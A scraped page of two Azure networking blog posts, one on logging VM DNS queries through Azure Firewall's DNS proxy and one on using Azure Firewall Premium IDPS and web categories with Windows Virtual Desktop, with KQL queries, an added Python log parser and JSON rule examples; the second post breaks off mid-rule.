One challenge you may have is that Azure DNS does not log DNS queries from your VMs, which means you have no visibility into which endpoints your Azure infrastructure is trying to connect to, or into the DNS name resolution queries being made.</P> <P>&nbsp;</P> <P>In this blog, we will see how Azure Firewall can help you overcome this challenge: it not only provides visibility into DNS queries sent to Azure DNS, but also lets you control traffic flows, both east-west and to the internet, for your Azure resources.</P> <P>&nbsp;</P> <P>Azure Firewall recently added Custom DNS and DNS proxy capabilities, which were a big ask from all of our customers. These are the features we will explore in this blog, along with how they can help you.</P> <P>&nbsp;</P> <H2><FONT color="#003366">Azure DNS</FONT></H2> <P>&nbsp;</P> <P>Azure DNS provides name resolution and basic authoritative DNS capabilities for public DNS names. The Azure DNS IP address is 168.63.129.16. Azure DNS provides DNS name resolution for your Azure infrastructure if you do not have your own DNS server hosted. For example, when you set up a new VM in Azure, it can resolve public names out of the box using Azure-provided name resolution (Azure DNS).</P> <P>&nbsp;</P> <H2>Azure Firewall Custom DNS</H2> <P>By default, Azure Firewall uses Azure DNS to ensure the service can reliably resolve internet-based names. Custom DNS allows you to configure Azure Firewall to use your own corporate DNS server or Azure DNS to resolve the DNS queries.</P> <P>You may configure a single DNS server or multiple servers in Azure Firewall and Firewall Policy DNS settings. We will go through the setup in more detail later on in this blog.</P> <P>&nbsp;</P> <H2>Azure Firewall DNS Proxy</H2> <P>This feature enables Azure Firewall to act as a DNS forwarder for your Infrastructure. 
When DNS proxy is enabled, your clients can point to Azure Firewall to resolve their DNS queries, and the firewall acts as the DNS server for your infrastructure.</P> <P>DNS Proxy logs all the queries coming from your infrastructure in Azure Firewall logs, and we will go through the logs in detail later on in this blog.</P> <P>We hope the above gives you a good understanding of the components involved in the challenge we are trying to resolve. Let’s look at the solution now and see how Azure Firewall Custom DNS and DNS proxy will help with getting visibility into Azure DNS logging.</P> <P>&nbsp;</P> <H2>Architecture</H2> <P>The problem we are trying to solve in this blog is that even when UDRs force all traffic to the Firewall, DNS traffic goes straight to DNS, which means you cannot log the DNS traffic or control the traffic flow going from your infrastructure to Azure DNS. With this architecture, you can centrally log all DNS traffic going to Azure DNS using Azure Firewall.</P> <P>&nbsp;</P> <P>For this architecture/deployment, a&nbsp;<A href="#" target="_blank" rel="noopener">hub and spoke model</A>&nbsp;is recommended, where the firewall is in its own Virtual Network. 
For the purpose of this blog, we will assume a simple architecture where both the workload VM and Azure Firewall are in the same virtual network but deployed in two different subnets, as shown in the diagram below.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-300px"><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Ashish_Kapila_6-1614014094878.png" style="width: 224px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/256537i5CE368300829C3AB/image-dimensions/224x309?v=v2" width="224" height="309" role="button" title="Ashish_Kapila_6-1614014094878.png" alt="Ashish_Kapila_6-1614014094878.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Azure Firewall Deployment</H2> <P>You can deploy Azure Firewall from the Azure portal, ARM, REST or CLI. The following article walks through setting up the above configuration step by step using the Azure portal.</P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener">Tutorial: Deploy &amp; configure Azure Firewall using the Azure portal | Microsoft Docs</A></P> <P>&nbsp;</P> <P>From the above article, you only need to follow the first five steps:</P> <P>&nbsp;</P> <OL> <LI><A href="#" target="_blank" rel="noopener">Prerequisites</A></LI> <LI><A href="#" target="_blank" rel="noopener">Set up the network</A></LI> <LI><A href="#" target="_blank" rel="noopener">Deploy the firewall</A></LI> <LI><A href="#" target="_blank" rel="noopener">Create a default route</A></LI> <LI><A href="#" target="_blank" rel="noopener">Configure an application rule</A></LI> <LI><A href="#" target="_blank" rel="noopener">Configure a DNAT rule</A></LI> </OL> <P>Once you have followed the above steps, you have an Azure Firewall and you can connect to your workload VM using the Azure Firewall Public IP.</P> <P>&nbsp;</P> <H2><FONT color="#003366">Custom DNS and DNS Proxy Configuration</FONT></H2> <P>&nbsp;</P> <P>We will now configure Custom DNS and DNS proxy in Azure 
Firewall.</P> <P>&nbsp;</P> <P><EM>Configure custom DNS servers and DNS Proxy - Azure portal</EM></P> <OL> <LI>Under Azure Firewall&nbsp;<STRONG>Settings</STRONG>, select&nbsp;<STRONG>DNS Settings</STRONG>.</LI> <LI>Under&nbsp;<STRONG>DNS servers</STRONG>, Select <STRONG>Default (Azure provided)</STRONG>.</LI> <LI>Under <STRONG>DNS Proxy</STRONG>, Select <STRONG>Enabled</STRONG></LI> <LI>Select&nbsp;<STRONG>Save</STRONG>.</LI> </OL> <P class="lia-indent-padding-left-60px">&nbsp;<span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Ashish_Kapila_7-1614014094891.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/256539i4BD0856D7891189B/image-size/large?v=v2&amp;px=999" role="button" title="Ashish_Kapila_7-1614014094891.png" alt="Ashish_Kapila_7-1614014094891.png" /></span></P> <P>&nbsp;</P> <P>Now the Azure firewall directs DNS traffic to Azure DNS for name resolution and Azure Firewall is configured as a DNS proxy.</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-330px"><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Ashish_Kapila_8-1614014094892.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/256538iF0388DA036B66A83/image-size/large?v=v2&amp;px=999" role="button" title="Ashish_Kapila_8-1614014094892.png" alt="Ashish_Kapila_8-1614014094892.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Enable Diagnostic logs for Azure Firewall</H2> <P>&nbsp;</P> <OL> <LI>In the Azure portal, Select the Azure firewall.</LI> <LI>Under&nbsp;<STRONG>Monitoring</STRONG>, select&nbsp;<STRONG>Diagnostic settings</STRONG>.</LI> </OL> <P>&nbsp;</P> <P><EM>For Azure Firewall, four service-specific logs are available:</EM></P> <UL> <LI>AzureFirewallApplicationRule</LI> <LI>AzureFirewallNetworkRule</LI> <LI>AzureFirewallThreatIntelLog</LI> <LI>AzureFirewallDnsProxy</LI> </UL> <P>&nbsp;</P> <OL start="3"> 
<LI>Select&nbsp;<STRONG>Add diagnostic setting</STRONG>. The&nbsp;<STRONG>Diagnostics settings</STRONG>&nbsp;page provides the settings for the diagnostic logs.</LI> <LI>In this example, Azure Monitor logs stores the logs, so type&nbsp;<STRONG>Firewall log analytics</STRONG>&nbsp;for the name.</LI> <LI>Under&nbsp;<STRONG>Log</STRONG>, select&nbsp;<STRONG>AzureFirewallApplicationRule</STRONG>,&nbsp;<STRONG>AzureFirewallNetworkRule</STRONG>,&nbsp;<STRONG>AzureFirewallThreatIntelLog</STRONG>, and&nbsp;<STRONG>AzureFirewallDnsProxy</STRONG>&nbsp;to collect the logs.</LI> <LI>Select&nbsp;<STRONG>Send to Log Analytics</STRONG>&nbsp;to configure your workspace.</LI> <LI>Select your subscription.</LI> <LI>Select&nbsp;<STRONG>Save</STRONG>.</LI> </OL> <H2>&nbsp;</H2> <H2><FONT color="#003366">Configure Azure Firewall as a DNS server</FONT></H2> <P>You can configure DNS server settings directly on the network interface of the virtual machine, or you can specify them at the virtual network level. Both methods are shown below.</P> <P>&nbsp;</P> <P><EM>Configure Azure Firewall as DNS server on your Workload Virtual Machine</EM></P> <OL> <LI>In the Azure portal, select the Workload Virtual Machine.</LI> <LI>Under&nbsp;<STRONG>Settings</STRONG>, select&nbsp;<STRONG>Networking</STRONG>.</LI> <LI>On the <STRONG>Networking </STRONG>page, click on <STRONG>Network Interface.</STRONG></LI> <LI>This will open up the<STRONG> Network Interface </STRONG>page. Under<STRONG> Settings, </STRONG>select <STRONG>DNS servers.</STRONG></LI> <LI>On the<STRONG> DNS Server </STRONG>page, select<STRONG> Custom </STRONG>and enter the internal IP of the Azure Firewall.</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-330px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Ashish_Kapila_9-1614014094904.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/256540i8B15239F97A4F63F/image-size/medium?v=v2&amp;px=400" role="button" 
title="Ashish_Kapila_9-1614014094904.png" alt="Ashish_Kapila_9-1614014094904.png" /></span></P> <P>&nbsp;</P> <P><EM>Configure Azure Firewall as DNS Server directly on the Virtual network</EM></P> <P>&nbsp;</P> <OL> <LI>In the search box at the top of the portal, enter&nbsp;virtual networks. When&nbsp;Virtual networks&nbsp;appears in the search results, select it.</LI> <LI>From the list of virtual networks, select the virtual network whose DNS servers you want to change.</LI> <LI>Select&nbsp;DNS servers, under&nbsp;SETTINGS. Select<STRONG> Custom </STRONG>and enter the internal IP of the Azure Firewall.</LI> </OL> <P class="lia-indent-padding-left-300px">&nbsp;<span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Ashish_Kapila_10-1614014094917.png" style="width: 356px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/256541i9AB5999977C18D79/image-dimensions/356x216?v=v2" width="356" height="216" role="button" title="Ashish_Kapila_10-1614014094917.png" alt="Ashish_Kapila_10-1614014094917.png" /></span></P> <P>&nbsp;</P> <P>Now we are all set up, and will quickly review how Azure Firewall gives us visibility into DNS queries from our Azure infrastructure going to Azure-provided DNS.</P> <P>&nbsp;</P> <OL> <LI>Azure Firewall is set up and using its default Custom DNS configuration, which is Azure DNS.</LI> <LI>Azure Firewall is now configured as DNS proxy and acts as a DNS server for our workload VM.</LI> <LI>Workload VM is configured to use Azure Firewall as a DNS server.</LI> <LI>Azure Firewall Diagnostic settings are configured and logging to Log analytics workspace.</LI> </OL> <P>&nbsp;</P> <P>Connect to your workload client and access the internet.</P> <OL> <LI>RDP to your workload Virtual machine.</LI> <LI>Open a browser and browse to <A href="#" target="_blank" rel="noopener">www.google.com</A></LI> </OL> <P>&nbsp;</P> <H2>Azure Firewall DNS log fields with explanations</H2> 
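<P>An added example (not code from the original article or from Azure): a Python parser for the DNS proxy message layout listed in this section, handling bracketed IPv6 clients and comma-separated response flags, plus a per-client NXDOMAIN summary that keeps unparsed lines instead of dropping them. The sample lines, the names <CODE>DnsProxyRecord</CODE>, <CODE>parse_line</CODE> and <CODE>summarize</CODE>, the true/false rendering of the DO bit, and the thresholds are assumptions made for illustration.</P>

```python
import ipaddress
import re
from collections import defaultdict
from dataclasses import dataclass

# Field order follows the article's format string. The optional "DNS Request: "
# prefix is the literal the article's Log Analytics query strips from msg_s.
# Assumption: the DO bit is rendered as "true"/"false" and duration ends in "s".
LINE_RE = re.compile(
    r"^(?:DNS Request: )?"
    r"(?P<remote>\[[^\]]+\]|[^\s:]+):(?P<port>\d+) - (?P<id>\d+) "
    r"(?P<type>\S+) (?P<cls>\S+) (?P<name>\S+) (?P<protocol>tcp|udp) "
    r"(?P<size>\d+) (?P<do>true|false) (?P<bufsize>\d+) "
    # rflags is matched lazily so both "qr,rd,ra" and "aa, tc" are accepted.
    r"(?P<rcode>\S+) (?P<rflags>.*?) (?P<rsize>\d+) "
    r"(?P<duration>\d+(?:\.\d+)?)s?$"
)


@dataclass(frozen=True)
class DnsProxyRecord:
    remote: str
    port: int
    query_id: int
    qtype: str
    qclass: str
    name: str
    protocol: str
    size: int
    dnssec_ok: bool
    bufsize: int
    rcode: str
    rflags: tuple
    rsize: int
    duration_s: float


def parse_line(line):
    """Return a DnsProxyRecord, or None when the line does not fit the layout."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    try:
        # IPv6 clients are logged in brackets, e.g. [::1]; validate either family.
        remote = str(ipaddress.ip_address(m["remote"].strip("[]")))
    except ValueError:
        return None
    flags = tuple(f.strip() for f in m["rflags"].split(",") if f.strip())
    return DnsProxyRecord(
        remote=remote, port=int(m["port"]), query_id=int(m["id"]),
        qtype=m["type"], qclass=m["cls"],
        # Normalise the queried name: drop the trailing root dot, lower-case it.
        name=m["name"].rstrip(".").lower() or ".",
        protocol=m["protocol"], size=int(m["size"]),
        dnssec_ok=(m["do"] == "true"), bufsize=int(m["bufsize"]),
        rcode=m["rcode"], rflags=flags, rsize=int(m["rsize"]),
        duration_s=float(m["duration"]),
    )


def summarize(lines, nx_ratio=0.5, min_queries=4):
    """Per-client counts, clients whose NXDOMAIN share meets nx_ratio, bad lines."""
    stats = defaultdict(lambda: {"queries": 0, "nxdomain": 0, "names": set()})
    unparsed = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            unparsed.append(line)  # keep for review instead of silently dropping
            continue
        entry = stats[rec.remote]
        entry["queries"] += 1
        entry["names"].add(rec.name)
        if rec.rcode == "NXDOMAIN":
            entry["nxdomain"] += 1
    noisy = sorted(
        client for client, e in stats.items()
        if e["queries"] >= min_queries and e["nxdomain"] / e["queries"] >= nx_ratio
    )
    return dict(stats), noisy, unparsed


# Constructed sample messages (not taken from a real workspace).
SAMPLE_LINES = [
    "DNS Request: 10.0.1.4:52949 - 2581 A IN www.google.com. udp 32 false 512 NOERROR qr,rd,ra 62 0.006513s",
    "DNS Request: 10.0.1.4:52950 - 2582 AAAA IN www.google.com. udp 32 false 512 NOERROR qr,rd,ra 74 0.004120s",
    "DNS Request: [2001:db8::10]:40112 - 77 A IN Portal.Example.COM. tcp 47 true 4096 NOERROR qr, rd, ra 120 0.010200s",
    "DNS Request: 10.0.1.9:33001 - 11 A IN host1.corp.example. udp 40 false 512 NXDOMAIN qr,rd,ra 115 0.020000s",
    "DNS Request: 10.0.1.9:33002 - 12 A IN host2.corp.example. udp 40 false 512 NXDOMAIN qr,rd,ra 115 0.019000s",
    "DNS Request: 10.0.1.9:33003 - 13 A IN host3.corp.example. udp 40 false 512 NXDOMAIN qr,rd,ra 115 0.021000s",
    "DNS Request: 10.0.1.9:33004 - 14 A IN www.example.com. udp 33 false 512 NOERROR qr,rd,ra 60 0.003000s",
    "DNS Request: truncated line without fields",
]

if __name__ == "__main__":
    stats, noisy, unparsed = summarize(SAMPLE_LINES)
    for client, e in sorted(stats.items()):
        print(client, e["queries"], "queries,", e["nxdomain"], "NXDOMAIN")
    print("high NXDOMAIN share:", noisy)
    print("unparsed lines:", len(unparsed))
```
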
<P>Format: {remote}:{port} - {id} {type} {class} {name} {protocol} {size} {do} {bufsize} {rcode} {rflags} {rsize} {duration}</P> <P>&nbsp;</P> <P>{remote}: client’s IP address; IPv6 addresses are enclosed in brackets: [::1]</P> <P>{port}: client’s port</P> <P>{id}: query ID</P> <P>{type}: type of the request</P> <P>{class}: class of the request</P> <P>{name}: name of the request</P> <P>{protocol}: protocol used (tcp or udp)</P> <P>{size}: request size in bytes</P> <P>{do}: is the EDNS0 DO (DNSSEC OK) bit set in the query</P> <P>{bufsize}: the EDNS0 buffer size advertised in the query</P> <P>{rcode}: response CODE</P> <P>{rflags}: response flags, each set flag will be displayed, e.g. “aa, tc”. This includes the qr bit as well</P> <P>{rsize}: response size</P> <P>{duration}: response duration</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><EM>Check the Azure Firewall DNS logs</EM></P> <P>&nbsp;</P> <OL> <LI>In the Azure portal, select the Azure Firewall.</LI> <LI>Under&nbsp;<STRONG>Monitoring</STRONG>, select&nbsp;<STRONG>Diagnostic settings.</STRONG></LI> <LI>On the <STRONG>Diagnostics settings</STRONG> page, click the <STRONG>workspace name</STRONG> under <STRONG>Log Analytics Workspace</STRONG>, which opens the Log Analytics workspace blade for you.</LI> <LI>In the left menu, select <STRONG>Logs</STRONG>, paste the following query, and click <STRONG>Run.</STRONG></LI> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="sql">// Split each DNS proxy message into the fields listed above
AzureDiagnostics
| where Category == "AzureFirewallDnsProxy"
| parse msg_s with "DNS Request: " ClientIP ":" ClientPort " - " QueryID " " Request_Type " " Request_Class " " Request_Name ". " Request_Protocol " " Request_Size " " EDNS0_DO " " EDNS0_Buffersize " " Response_Code " " Response_Flags " " Response_Size " " Response_Duration
| project-away msg_s
| summarize by TimeGenerated, ResourceId, ClientIP, ClientPort, QueryID, Request_Type, Request_Class, Request_Name, Request_Protocol, Request_Size, EDNS0_DO, EDNS0_Buffersize, Response_Code, Response_Flags, Response_Size, Response_Duration, SubscriptionId</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <OL start="5"> <LI>You will see an output like the one below and can see all the DNS queries your workload VM is making to Azure-provided DNS.</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-90px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Ashish_Kapila_11-1614014094927.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/256542i02E6B4E6983F465B/image-size/large?v=v2&amp;px=999" role="button" title="Ashish_Kapila_11-1614014094927.png" alt="Ashish_Kapila_11-1614014094927.png" /></span></P> <P>&nbsp;</P> <P>As you can see, your organization now has visibility into all the DNS requests that your Azure infrastructure makes to Azure-provided DNS, and you have seen how you can utilize Azure Firewall to control traffic flows.<BR />You can also use this <A title="Firewall as DNS Proxy in Hub and Spoke topology" href="#" target="_self">template in Github</A>&nbsp;to deploy&nbsp;Azure Firewall as a DNS Proxy in a Hub and Spoke topology along with Private Endpoints.<BR />We hope 
you find this blog useful.<BR /><BR />Thanks to&nbsp;Paolo Salvatori for providing the template for the <A href="#" target="_self">ARM deployment</A>.</P> Tue, 27 Apr 2021 17:14:38 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/enabling-central-visibility-for-dns-using-azure-firewall-custom/ba-p/2156331 Ashish_Kapila 2021-04-27T17:14:38Z How to use Azure Firewall Premium with WVD https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/how-to-use-azure-firewall-premium-with-wvd/ba-p/2148402 <P>Azure Firewall Premium is now in Public Preview and offers many new and powerful capabilities that can be used in your Windows Virtual Desktop environment. These capabilities include Intrusion Detection and Prevention System (IDPS) and Web Categories. In this post you can learn more about these capabilities and how they protect Windows Virtual Desktop environments, and see some sample application and network rules and their anatomy.</P> <P>&nbsp;</P> <P>Assets created in this article can be <A href="#" target="_self">found here:</A></P> <P>&nbsp;</P> <P>If you would like to test along, check out the <A href="#" target="_blank" rel="noopener">instructions on how to deploy Azure Firewall premium</A>. Be sure to take into consideration the WVD virtual network and that there is a dedicated subnet for Azure Firewall. The minimum IP address space in CIDR notation needed is /26 for the dedicated Azure Firewall subnet. 
The subnet must also be named <STRONG><EM>AzureFirewallSubnet</EM></STRONG>. Below is a sample template I use in pilots using a single Virtual Network with multiple subnets and segmentation for Windows Virtual Desktop.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="2021-02-19_1-28-28.png" style="width: 824px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255954i03498BFE531F857C/image-size/large?v=v2&amp;px=999" role="button" title="2021-02-19_1-28-28.png" alt="2021-02-19_1-28-28.png" /></span></P> <P>&nbsp;</P> <P>After Azure Firewall Premium is deployed, be sure to create a User Defined Route by creating a Route Table in Azure.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture3.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255955i8740ADDE20C4FAA3/image-size/large?v=v2&amp;px=999" role="button" title="Picture3.png" alt="Picture3.png" /></span></P> <P>&nbsp;</P> <P>Once created, go to the route table and add a route.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture4.png" style="width: 585px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255956i4BBAEC46CF880445/image-size/large?v=v2&amp;px=999" role="button" title="Picture4.png" alt="Picture4.png" /></span></P> <P>&nbsp;</P> <P>When adding the route for testing, you can add a quad-zero route of 0.0.0.0/0, which will steer all public traffic to a next hop address of the Azure Firewall Premium private IP address.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture5.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255957i6C768E585A3EF0B2/image-size/large?v=v2&amp;px=999" role="button" title="Picture5.png" alt="Picture5.png" 
/></span></P> <P>&nbsp;</P> <P>If you have additional VNETs or Subnets for testing, add more granular routes xx.xx.xx.xx/yy to each Azure private IP address space that needs to pass to the Azure Firewall, be sure to include next hop address of the Azure Firewall Premium private IP address.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture6.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255958i2AEB1D67167F3B56/image-size/large?v=v2&amp;px=999" role="button" title="Picture6.png" alt="Picture6.png" /></span></P> <P>&nbsp;</P> <P>Once added we can associate the route to the Windows Virtual Desktop subnet. Once associated the traffic will flow to Azure Firewall Premium as next hop.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture7.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255959i4F287C23F1BE6A9D/image-size/large?v=v2&amp;px=999" role="button" title="Picture7.png" alt="Picture7.png" /></span></P> <P>&nbsp;</P> <P><STRONG>Intrusion Detection and Prevention System (IDPS)</STRONG></P> <P>&nbsp;</P> <P>Azure Firewall Premium now brings Intrusion Detection and Prevention System (IDPS) to your virtual network and Windows Virtual Desktop Host Pool internet bound communications. IDPS is a great feature to use as you may allow some openness to your Internet bound traffic within Windows Virtual Desktop. As employees surf the web or execute programs, IDPS can scan each network connection against its rules and then Audit or Audit and Deny traffic based on signature matches.</P> <P>&nbsp;</P> <P>To turn on this feature with Azure Firewall policy applied to it, you will find a new blade for IDPS (preview). Please note this will only work for Azure Firewall premium. 
In addition, be sure to <A href="#" target="_blank" rel="noopener">review configuring your Azure Firewall policies</A> to use KeyVault and certificates to do TLS inspection, this will greatly enhance IDPS.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture8.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255960i0E91399F833EE973/image-size/large?v=v2&amp;px=999" role="button" title="Picture8.png" alt="Picture8.png" /></span></P> <P>&nbsp;</P> <P>Once turned on you will want to send the Azure Firewall Diagnostic traffic to Log Analytics or your SIEM of choice. This is because it will help record the Signatures discovered that were audited or denied in IDPS so you can use Signature Rules.</P> <P>&nbsp;</P> <P>You can set this up by going to the Azure Firewall resource and to the Diagnostic Settings blade and Add Diagnostic Settings.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture9.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255961iBE64F4B7A9379A5F/image-size/large?v=v2&amp;px=999" role="button" title="Picture9.png" alt="Picture9.png" /></span></P> <P>&nbsp;</P> <P>Then define and send the logs to Log Analytics workspace</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture10.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255962iD0F63A4B447E4B2F/image-size/large?v=v2&amp;px=999" role="button" title="Picture10.png" alt="Picture10.png" /></span></P> <P>&nbsp;</P> <P>Within Log Analytics you can use the following Query to look at the traffic that was alerted or alerted and denied on with IDPS, including the signature in the event you need to tweak the Signature to allow or deny.</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE 
lang="yaml">AzureDiagnostics
| where TimeGenerated &gt;= ago(90d)
| where Category == "AzureFirewallNetworkRule"
| where OperationName == "AzureFirewallIDSLog"
| parse msg_s with * "TCP request from " Source " to " Destination ". Action: " ActionTaken ". Rule: " IDPSSig ". IDS: " IDSMessage ". Priority: " Priority ". Classification: " Classification
| project TimeGenerated, Source, Destination, ActionTaken, IDPSSig, IDSMessage, Priority, Classification</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture11.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255963iDDE6BADD3F705034/image-size/large?v=v2&amp;px=999" role="button" title="Picture11.png" alt="Picture11.png" /></span></P> <P>&nbsp;</P> <P>Once you have a signature, you can use it in the Azure Firewall policy's IDPS (Preview) blade to override, per signature, the default mode you set for IDPS earlier. This can help with false positives if Deny is the default IDPS mode, or with adding to blocklists you generate in a permissive Alert Only IDPS mode.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture12.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255964iD6C1E5DD5926352E/image-size/large?v=v2&amp;px=999" role="button" title="Picture12.png" alt="Picture12.png" /></span></P> <P>&nbsp;</P> <P>Finally, if you need certain WVD host pool members or other components of the architecture to bypass IDPS altogether, you can set this within the Bypass list. You may have a WVD Host Pool that includes a legacy application that does not have methods of supporting certificates from the Azure Firewall. Most modern applications and web browsers support this, but if you do encounter one you can use this bypass list. 
The Bypass list allows a 5 tuple network rule configuration. Once configured the servers originating traffic will no longer pass through IDPS.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture13.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255965i598A461AA4320277/image-size/large?v=v2&amp;px=999" role="button" title="Picture13.png" alt="Picture13.png" /></span></P> <P>&nbsp;</P> <P><STRONG>Web Categories</STRONG></P> <P>&nbsp;</P> <P>Another approach is to use web categories to deny or allow traffic based on website characteristics like social media sites or gambling websites as an example. There are 64 web categories across differing classifications for selection. This is certainly appealing to block or allow web content to your employees utilizing their Windows 10 interface to the Internet through Windows Virtual Desktop. Below is an example of creating a rule collection and using web categories to deny traffic from Windows Virtual Desktop host pools. 
An even more interesting feature is that if you were to block News, for instance, under Azure Firewall Premium, a URL like <A href="#" target="_blank" rel="noopener">www.google.com/news</A> would be blocked under the web category, so it extends beyond the FQDN and into the URL path.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture14.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255966i9B51B124689C3D1F/image-size/large?v=v2&amp;px=999" role="button" title="Picture14.png" alt="Picture14.png" /></span></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture15.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255967i9C359CA32F502B39/image-size/large?v=v2&amp;px=999" role="button" title="Picture15.png" alt="Picture15.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="json">{ "ruleType": "ApplicationRule", "name": "AllowNews", "protocols": [ { "protocolType": "Https", "port": 443 } ], "webCategories": [ "business", "webbasedemail" ], "sourceAddresses": [ "*" ], "terminateTLS": true }</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><STRONG>Anatomy of a Firewall Rule Collection</STRONG></P> <P>&nbsp;</P> <P>When using Azure Firewall to protect your Windows Virtual Desktop host pools, there are special rules that have to be implemented beyond the Windows Virtual Desktop tag to allow for the host pools to communicate properly with the Host Traffic. The needed WVD rules are <A href="#" target="_blank" rel="noopener">outlined here</A>, but you can use the rules as an example to walk through the anatomy of an Azure Firewall rule as code.</P> <P>&nbsp;</P> <P>One of the capabilities of Azure Firewall is configuration as code, in particular ARM Template code in Declarative JSON. 
As an example you will walk through the firewall rule as code.</P> <P>&nbsp;</P> <P>You will need a couple rule collections to allow traffic for the Windows Virtual Desktop host pools to communicate outbound to the management plane. &nbsp;A rule collection code is very simple, it allows you to define a collection of rules for the Azure Firewall, the priority they will take, the action of allowing or denying traffic in those rules and the rules themselves. An example below.</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="json">{ "name": "AllowAdditionalWVDApp", "priority": 203, "ruleCollectionType": "FirewallPolicyFilterRuleCollection", "action": { "type": "Allow" }, "rules": [] }</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>In the next section you will want to define those rules that fit within the collection.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture16.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255968i81BABF04E26BB0FD/image-size/large?v=v2&amp;px=999" role="button" title="Picture16.png" alt="Picture16.png" /></span></P> <P>&nbsp;</P> <P>According to the Azure documentation you will use an Application rule and a FQDN tag. 
The following rule code fits into the rule collection code “rules”: […]</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="json">{
  "ruleType": "ApplicationRule",
  "name": "AllowWVDTag",
  "protocols": [
    { "protocolType": "Https", "port": 443 }
  ],
  "fqdnTags": [ "WindowsVirtualDesktop" ],
  "targetFqdns": [],
  "sourceAddresses": [ "XX.XX.XX.XX/YY" ],
  "sourceIpGroups": [],
  "terminateTLS": false
